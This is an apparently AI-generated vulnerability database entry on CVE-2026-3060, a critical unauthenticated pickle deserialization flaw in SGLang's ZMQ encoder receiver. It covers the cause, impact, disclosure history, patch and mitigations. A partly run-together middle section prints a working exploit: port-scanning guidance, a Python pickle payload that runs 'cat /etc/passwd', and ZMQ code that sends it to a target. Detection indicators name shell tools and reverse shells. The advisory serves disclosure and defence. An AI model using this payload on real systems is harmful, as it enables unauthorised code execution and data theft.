
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-3060 is a critical unauthenticated remote code execution (RCE) vulnerability in SGLang's encoder parallel disaggregation module (encode_receiver.py). The flaw arises from the use of Python's pickle.loads() to deserialize untrusted data received over an unauthenticated ZeroMQ (ZMQ) TCP socket. It affects SGLang versions 0.5.5 through 0.5.9 (all versions with the disaggregation feature enabled). The vulnerability was discovered by Igor Stepansky of Orca Security on 2026-02-04, coordinated through CERT/CC (case VU#665416), and publicly disclosed on 2026-03-11/12. It carries a CVSS v3.1 base score of 9.8 (Critical) (Orca Security, Red Hat CVE).
The root cause is CWE-502 (Deserialization of Untrusted Data): the disaggregation encoder receiver in encode_receiver.py binds a ZMQ PULL socket to tcp://* (all network interfaces) and calls pickle.loads() directly on any received bytes without authentication, authorization, or input validation. Python's pickle protocol encodes arbitrary object reconstruction instructions — including calls to os.system, subprocess.Popen, or eval — via the __reduce__ method, making any pickle.loads() on attacker-controlled data equivalent to remote code execution. The attack requires only network access to the exposed ZMQ broker TCP port (default: HTTP port + 1); no credentials, API keys, or user interaction are needed. The vulnerability is part of a broader systemic pattern of unsafe pickle usage across SGLang's codebase (20+ instances), and is closely related to CVE-2026-3059 (multimodal generation ZMQ broker) and CVE-2026-3989 (crash dump replay script) (Orca Security, CERT/CC).
Successful exploitation grants an unauthenticated remote attacker full code execution with the privileges of the SGLang process, resulting in complete confidentiality, integrity, and availability compromise of the affected system. In typical production deployments — Kubernetes pods, Docker containers, or dedicated GPU nodes — this could expose LLM model weights, inference data, API credentials, and GPU workloads. The compromised SGLang instance can also serve as a pivot point for lateral movement into the surrounding cluster or cloud environment. The feature must be explicitly enabled (--encoder-transfer-backend zmq_to_scheduler); default text-only SGLang deployments are not affected (Orca Security).
Functional proof-of-concept (PoC) code for CVE-2026-3060 was developed by Orca Security and shared with CERT/CC during coordinated disclosure; the exploit is a single ZMQ message containing a crafted pickle payload and requires minimal attacker skill given the trivial nature of pickle deserialization exploits. No in-the-wild exploitation has been observed as of publication. The vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.0066 (low probability of near-term exploitation), though the trivial exploit mechanics and lack of authentication lower the practical barrier significantly (Orca Security, Feedly).
--encoder-transfer-backend zmq_to_scheduler). Scan for open ZMQ TCP ports — the default broker port is the HTTP port + 1 (e.g., port 30001 if HTTP is on 30000). Tools like Shodan, Censys, or nmap can identify exposed ports.__reduce__ method that returns a callable (e.g., os.system) and the desired command as arguments:import os, pickle
class RCEPayload:
def __init__(self, cmd): self.cmd = cmd
def __reduce__(self): return (os.system, (self.cmd,))
payload = pickle.dumps(RCEPayload("id; cat /etc/passwd"))import zmq
ctx = zmq.Context()
sock = ctx.socket(zmq.PUSH)
sock.connect(f"tcp://{target_ip}:{broker_port}")sock.send(payload)pickle.loads() on the received bytes, triggering execution of the attacker's command with the full privileges of the SGLang process — no response or further interaction required (Orca Security)./bin/sh, /bin/bash, curl, wget, nc, or python; unexpected process trees originating from the SGLang service account./tmp/, the SGLang installation directory, or crash dump folders created by the SGLang process; presence of reverse shell scripts or web shells in unexpected locations.execve calls from the SGLang process (Orca Security).A patch was merged into SGLang's main branch on 2026-03-27 (PR #20904) and included in the v0.5.10 release, which binds ZMQ sockets to localhost by default (preventing remote exploitation) and replaces unsafe pickle.loads() with a SafeUnpickler for CVE-2026-3989; follow-up work targets msgpack-based serialization for CVE-2026-3059/3060. Immediate actions: (1) Upgrade to SGLang v0.5.10 or later. (2) If upgrading is not immediately possible, use firewall rules to restrict access to the ZMQ broker port (HTTP port + 1) to localhost or known trusted internal clients only. (3) Disable the disaggregation feature (--encoder-transfer-backend zmq_to_scheduler) if not required. (4) Ensure SGLang is not deployed with broker ports exposed to untrusted networks or the public internet (SGLang v0.5.10 Release, SGLang PR #20904).
The vulnerability was discovered by Igor Stepansky (Orca Security) and coordinated through CERT/CC (VU#665416); notably, the SGLang maintainers did not respond to multiple disclosure attempts via GitHub Security Advisories and direct email — including CISA outreach — during the 45-day coordination window, prompting public disclosure without an official vendor statement (Orca Security). After public disclosure, community contributors (notably zwang86) submitted a fix within days, which was merged on 2026-03-27. A collaborator (kpham-sgl) noted that SafeUnpickler is bypassable and advocated for msgpack or HMAC-based serialization as a more robust long-term solution (SGLang PR #20904). The vulnerability received coverage from The Hacker News, SecurityOnline, SAPInsider, and Fortbridge, with commentary highlighting the systemic risk of pickle deserialization across the Python AI/ML ecosystem (The Hacker News, SecurityOnline).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."